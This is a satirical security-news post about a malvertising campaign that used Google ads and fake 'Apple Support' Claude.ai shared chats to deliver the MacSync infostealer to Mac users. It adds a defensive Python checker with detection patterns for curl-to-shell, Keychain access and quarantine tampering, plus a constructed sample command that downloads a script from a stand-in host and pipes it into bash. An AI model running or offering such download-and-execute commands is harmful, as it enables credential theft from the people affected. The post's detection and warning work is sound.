The Open-Palm Attack Vector
In a campaign that deserves some kind of award for ironic creativity, hackers have been using Google Ads and Anthropic’s own Claude.ai shared chat feature to distribute Mac malware to people trying to download Claude. The attack was discovered by security engineer Berk Albayrak of the Trendyol Group, with BleepingComputer independently finding a second variant using different infrastructure.
Here’s how it works: you search Google for “Claude mac download.” You see a sponsored result that points to the legitimate claude.ai domain. You click it. You land on a shared Claude conversation that looks like an official installation guide, attributed to “Apple Support,” and it politely asks you to open Terminal and paste a base64-encoded command.
At which point you have voluntarily installed an infostealer on your own machine using instructions provided by the AI you were trying to install. The future is a Möbius strip of bad decisions.
The Two-Handed Dissection
The technical details are genuinely clever. The base64 command downloads a shell script from domains including customroofingcontractors[.]com, because nothing says “legitimate AI installation” like a roofing contractor’s compromised website. A second variant uses bernasibutuwqu2[.]com, which isn’t even pretending.
The secondary payload, loader.sh, is a gzip-compressed shell script (decompressed with gunzip) that executes entirely in memory using polymorphic delivery: each server request returns uniquely obfuscated code, which defeats signature-based detection. In BleepingComputer’s variant, the script checks for Russian or CIS-region keyboard configurations and exits without infection if found. Machines with Cyrillic layouts receive a cis_blocked status ping and are left untouched. Draw your own conclusions.
The final payload uses macOS’s native osascript engine to execute, avoiding traditional binary drops entirely. The malware itself, dubbed MacSync, harvests browser credentials, cookies, and the entire macOS Keychain before packaging everything for exfiltration. Your passwords, your saved logins, your auto-filled credit card numbers: all of it, delivered to an attacker because you trusted a Google ad.
The Gentle Awakening
There’s a poetic cruelty to this attack that deserves acknowledgment. Shared chats on Claude.ai are a legitimate feature; they let users share conversations publicly. The destination URL in the ad is genuine. The claude.ai domain is real. The only thing that’s fake is the content of the conversation, which was authored by an attacker, not by Apple Support, and not by Anthropic.
This is not, BleepingComputer notes, the first time attackers have abused AI platform shared chats this way. The feature that lets you share a helpful conversation with a colleague is the same feature that lets a threat actor create a convincing installation guide that steals your entire digital identity. The trust is in the domain. The danger is in the content.
And here’s the uncomfortable part: the people most likely to fall for this are the least technical Claude users, the ones who search Google instead of navigating directly, who trust sponsored results, who don’t read base64 before pasting it into Terminal. The attack specifically targets people who want to use AI but don’t yet know enough to protect themselves from it.
The Gold-Leaf Reckoning
The recommendations are straightforward: navigate directly to claude.ai instead of clicking sponsored search results. Treat any instruction that asks you to paste commands into Terminal with extreme suspicion, especially if it comes from a “shared chat” you didn’t create yourself. And for the love of your Keychain, read what you’re pasting before you paste it.
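“Read what you’re pasting before you paste it” is easier said than done when the thing you’re pasting is a base64 blob. The following is an added example, not code from the article or from any of the researchers it cites: a small Python checker that decodes any base64 tokens in a pasted command (recursively, since the decoded layer may itself contain more base64), then flags the generic markers this article’s dissection describes: a remote script piped straight into a shell, a nested base64 decode, in-memory gunzip, osascript execution, and Keychain access. The sample command, the example.invalid URL and the pattern names are constructed for the demo; the patterns are deliberately generic and are not signatures for the MacSync campaign.

```python
import base64
import re

# Generic markers a reviewer would want flagged before pasting a "setup"
# command into Terminal. These are constructed for this example, not
# indicators from the campaign described in the article.
RISKY_PATTERNS = {
    "remote script piped into a shell": re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba|z)?sh\b"),
    "nested base64 decode": re.compile(r"\bbase64\s+(-d|--decode|-D)\b"),
    "in-memory decompression": re.compile(r"\b(gunzip|gzip\s+-d|zcat)\b"),
    "AppleScript/JXA execution": re.compile(r"\bosascript\b"),
    "eval of generated code": re.compile(r"\beval\b"),
    "Keychain access": re.compile(r"(~|/Users/[^/\s]+)/Library/Keychains|\bsecurity\s+(find|dump)-"),
    "quarantine or history tampering": re.compile(r"(unset\s+HISTFILE|xattr\s+-d\s+com\.apple\.quarantine)"),
}

# A run of 20+ base64-alphabet characters, optionally padded. Ordinary shell
# words are shorter than this, so false positives are rare and are dropped
# anyway when they fail to decode to UTF-8 text.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_base64_tokens(command: str, max_depth: int = 3) -> list[str]:
    """Return every decodable base64 token found in `command`, layer by layer:
    a decoded layer that itself contains base64 is decoded again, up to max_depth."""
    layers: list[str] = []
    frontier = [command]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for token in B64_TOKEN.findall(text):
                try:
                    decoded = base64.b64decode(token, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not really base64, or binary: leave it alone
                layers.append(decoded)
                next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def inspect_command(command: str) -> dict:
    """Decode any base64 in a pasted command and report which risk markers appear
    in the visible command or in any decoded layer."""
    decoded_layers = decode_base64_tokens(command)
    visible = "\n".join([command, *decoded_layers])
    findings = sorted(name for name, pat in RISKY_PATTERNS.items() if pat.search(visible))
    return {
        "decoded_layers": decoded_layers,
        "findings": findings,
        "verdict": "do not run" if findings else "no known risk markers",
    }


# Constructed sample in the shape the article describes: an "installation
# guide" one-liner that hides a curl-to-shell download behind base64.
INNER_COMMAND = "curl -fsSL https://example.invalid/loader.sh | gunzip -c | bash"
SAMPLE_COMMAND = (
    'echo "' + base64.b64encode(INNER_COMMAND.encode()).decode() + '" | base64 -d | sh'
)

if __name__ == "__main__":
    report = inspect_command(SAMPLE_COMMAND)
    print("pasted:", SAMPLE_COMMAND)
    for i, layer in enumerate(report["decoded_layers"], start=1):
        print(f"decoded layer {i}:", layer)
    print("findings:", ", ".join(report["findings"]) or "none")
    print("verdict:", report["verdict"])
```

Run it as a script to see the sample one-liner unpacked into its real curl-to-bash instruction, or import `inspect_command` and pass it whatever a “shared chat” told you to paste. The verdict is only as good as the marker list; the point is that the decoded text becomes readable at all, which is the step the campaign relies on victims skipping.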
Anthropic will presumably need to address the shared chat abuse vector β content moderation for conversations that masquerade as official installation guides would be a reasonable start. Google, meanwhile, continues to sell advertising space to people who use it to distribute malware, a business model that remains stubbornly profitable for everyone except the victims.
The C2 domain for the first variant, briskinternet[.]com, was reportedly down at the time of publication. The second variant’s infrastructure remains active. If you’ve recently installed Claude via a Google ad and a helpful Terminal command, now would be an excellent time to check your Keychain access logs and change every password you’ve ever created.
“The user searched for Claude, found Claude, clicked on Claude, and got malware. The URL was real, the domain was real, the conversation was fake, and the roofing contractor’s website did the heavy lifting. We’ve reached peak supply-chain irony.” (The Slap of Wisdom Malware Sommelier, tasting notes of polymorphic shell scripts and finding hints of Eastern European oak)